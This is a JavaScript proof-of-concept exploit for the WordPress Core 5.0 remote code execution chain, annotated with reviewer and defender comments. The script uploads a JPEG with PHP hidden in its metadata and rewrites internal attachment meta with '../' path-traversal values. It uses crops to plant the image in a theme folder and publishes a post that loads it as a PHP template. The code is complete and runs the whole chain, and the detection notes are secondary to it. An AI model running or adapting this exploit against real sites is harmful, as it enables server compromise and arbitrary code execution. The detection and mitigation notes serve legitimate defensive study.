// Proof-of-concept state and constants for the "WordPress Core 5.0 - Remote Code
// Execution" chain. The script uses jQuery and site-relative /wp-admin URLs, so it
// is meant to run inside an already authenticated wp-admin browser session.
// NOTE(review): presumably the session needs media-upload and post-edit rights
// (every request below goes to upload/edit endpoints) - confirm against the advisory.
//
// Shared mutable state filled in by the request chain that follows.
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
// Marker code embedded in the image. phpinfo() only prints configuration, so its
// output showing up on a public post is the visible sign that the chain worked.
// The trailing "/*" opens a PHP comment.
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
// JPEG template: starts with the SOI marker (\xff\xd8), carries a "Photoshop 3.0" /
// "8BIM" metadata segment holding the 7-byte PAYLOAD placeholder (preceded by its
// \x07 length byte), then a JFIF header and what appears to be a minimal 1x1 image,
// ending with the EOI marker (\xff\xd9).
// Defender note: the file is a structurally valid JPEG, so extension and MIME checks
// pass; scanning uploaded images for "<?php" inside metadata segments is what
// catches it.
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
// Swap the length byte and placeholder for the real length byte and marker code.
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
// Every character in img is a code point <= 0xFF, so this maps one character to
// one byte and the upload is the exact binary image rather than UTF-8 text.
var byteArray = Uint8Array.from(img, function(c){return c.codePointAt(0);});
// wp-admin endpoints touched by the chain. Seen in this order within a few seconds
// from one session, they form a usable access-log signature.
var attachurl = '/wp-admin/media-new.php';
var uploadurl = '/wp-admin/async-upload.php';
// 'PID' is a placeholder replaced with the attachment ID after upload.
var editattachurl = '/wp-admin/post.php?post=PID&action=edit';
var editposturl = '/wp-admin/post.php';
var addposturl = '/wp-admin/post-new.php';
var cropurl = '/wp-admin/admin-ajax.php';
// Request chain for the WordPress Core 5.0 RCE proof of concept. Each step runs in
// the success callback of the previous one, so statement order is the attack order:
//   1. scrape an upload nonce          2. upload a JPEG carrying PHP in its metadata
//   3. scrape edit/crop nonces         4. overwrite _wp_attached_file, crop (twice)
//   5. create a post whose _wp_page_template points at the cropped image
// All requests are same-origin and carry the logged-in user's cookies; the nonces
// are read from pages that user may legitimately load, so nonce checks do not stop
// a script running inside that session.
// Defender summary: the root problem shown here is that post.php accepts
// client-supplied meta_input[...] values for internal meta keys. Mitigate by
// running a WordPress release that rejects those keys, and alert on the request
// patterns called out below.
//
// Step 1: load the media upload page and read the nonce from its upload form.
console.log("Get wpnonce token.");
jQuery.get(attachurl, function(data) {
wpnonce = jQuery(data).find('#file-form #_wpnonce').val();
if(wpnonce) {
console.log("Success! wpnonce: " + wpnonce);
// Step 2: build the multipart upload. post_id is still 0 at this point.
var postdata = new FormData();
postdata.append('name', 'ebaldremal.jpg');
postdata.append('post_id', post_id);
postdata.append('_wpnonce', wpnonce);
postdata.append('short', 1);
// Wrap the image bytes in a File so they are sent as a real file part.
var phpimage = new File([byteArray], 'ebaldremal.jpg');
postdata.append('async-upload', phpimage);
console.log("Upload image with shell.");
jQuery.ajax({
url: uploadurl,
data: postdata,
cache: false,
// contentType/processData false: let the browser set the multipart boundary and
// send the FormData object untouched.
contentType: false,
processData: false,
method: 'POST',
success: function(data){
// The script treats a purely numeric response body as the new attachment ID;
// any other response ends the chain silently.
if(jQuery.isNumeric(data)) {
post_id = data;
console.log("Success! Attach ID: " + post_id);
console.log("Get wpnonce for edit post, ajax_nonce for crop and URL for fun.");
// Step 3: open the attachment's edit screen and scrape what later steps need.
jQuery.get(editattachurl.replace('PID', post_id), function(data) {
var btnid = "#imgedit-open-btn-" + post_id;
wpnonce = jQuery(data).find('#post #_wpnonce').val();
// The image-editor nonce is taken as the first 10-hex-digit run in the button's
// onclick attribute.
ajaxnonce = jQuery(data).find(btnid).attr('onclick').match(/[a-f0-9]{10}/)[0];
imgurl = new URL(jQuery(data).find('#attachment_url').val());
// Path of the uploaded file relative to uploads/, with "?/any" appended.
wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/any";
console.log("Success! wpnonce: " + wpnonce + ", ajaxnonce: " + ajaxnonce);
if(wpnonce && ajaxnonce) {
console.log("Update _wp_attached_file meta key to: " + wp_attached_file);
// Step 4a: overwrite the attachment's internal _wp_attached_file meta via the
// ordinary "editpost" action.
// Detection: POSTs to /wp-admin/post.php carrying meta_input[...] parameters, and
// _wp_attached_file values in wp_postmeta that contain "?" or "../".
postdata = {
'_wpnonce': wpnonce,
'action': 'editpost',
'post_ID': post_id,
'meta_input[_wp_attached_file]': wp_attached_file
}
jQuery.post(editposturl, postdata, function(data){
console.log("Success!");
console.log("Crop image for create help folder.");
// Step 4b: ask the crop-image AJAX action for a 1x1 crop of the attachment. Per
// the log message, this first crop only creates an intermediate directory.
postajaxdata = {
'_ajax_nonce': ajaxnonce,
'action': 'crop-image',
'id': post_id,
'cropDetails[width]': 1,
'cropDetails[height]': 1
}
jQuery.post(cropurl, postajaxdata, function(data){
console.log("Success! Help directory created.");
// Step 4c: second overwrite. The "../" sequences after the "?" point the stored
// path out of uploads/ and into the twentynineteen theme directory.
wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/../../../../themes/twentynineteen/owned";
console.log("Update _wp_attached_file meta key to: " + wp_attached_file);
postdata = {
'_wpnonce': wpnonce,
'action': 'editpost',
'post_ID': post_id,
'meta_input[_wp_attached_file]': wp_attached_file
}
jQuery.post(editposturl, postdata, function(data){
console.log("Success!");
console.log("Crop image for create evil jpg image inside twentynineteen theme folder.");
// Step 4d: repeat the crop with the traversal path in place. Per the log message
// the cropped copy now lands inside the theme folder.
// Detection: file-integrity monitoring on wp-content/themes; any "cropped-*"
// image file appearing in a theme directory.
jQuery.post(cropurl, postajaxdata, function(data){
console.log("Success!");
console.log("Get wpnonce for create new post.");
// Step 5: load the new-post screen to obtain a nonce and a draft post ID.
jQuery.get(addposturl, function(data){
console.log("Create new post and use evil jpg image as template.");
// Two page layouts are handled; which form is present depends on the editor the
// site serves (presumably block editor vs. classic editor - confirm).
if(jQuery(data).find('form.metabox-base-form').length) {
wpnonce = jQuery(data).find('form.metabox-base-form #_wpnonce').val();
post_id = jQuery(data).find('form.metabox-base-form #post_ID').val();
} else {
wpnonce = jQuery(data).find('#post #_wpnonce').val();
post_id = jQuery(data).find('#post #post_ID').val();
}
// Publish a public post whose page-template meta names the cropped image rather
// than a theme PHP file.
// Detection: _wp_page_template values in wp_postmeta that do not end in ".php";
// the post title 'RCE-HERE' is specific to this proof of concept.
postdata = {
'_wpnonce': wpnonce,
'action': 'editpost',
'post_ID': post_id,
'post_title': 'RCE-HERE',
'visibility': 'public',
'publish': 'Publish',
'meta_input[_wp_page_template]': 'cropped-owned.jpg'
}
jQuery.post(editposturl, postdata, function(data){
console.log("Success! Browse post with id = " + post_id + " to trigger RCE.")
console.log("Trying to open: " + imgurl.origin + "/?p=" + post_id + ")");
// Viewing the post is what makes the site load the "template"; the marker code
// embedded in the image runs at that point.
window.open(imgurl.origin + "/?p=" + post_id, '_blank');
});
});
});
});
});
});
}
});
}
}
});
}
});
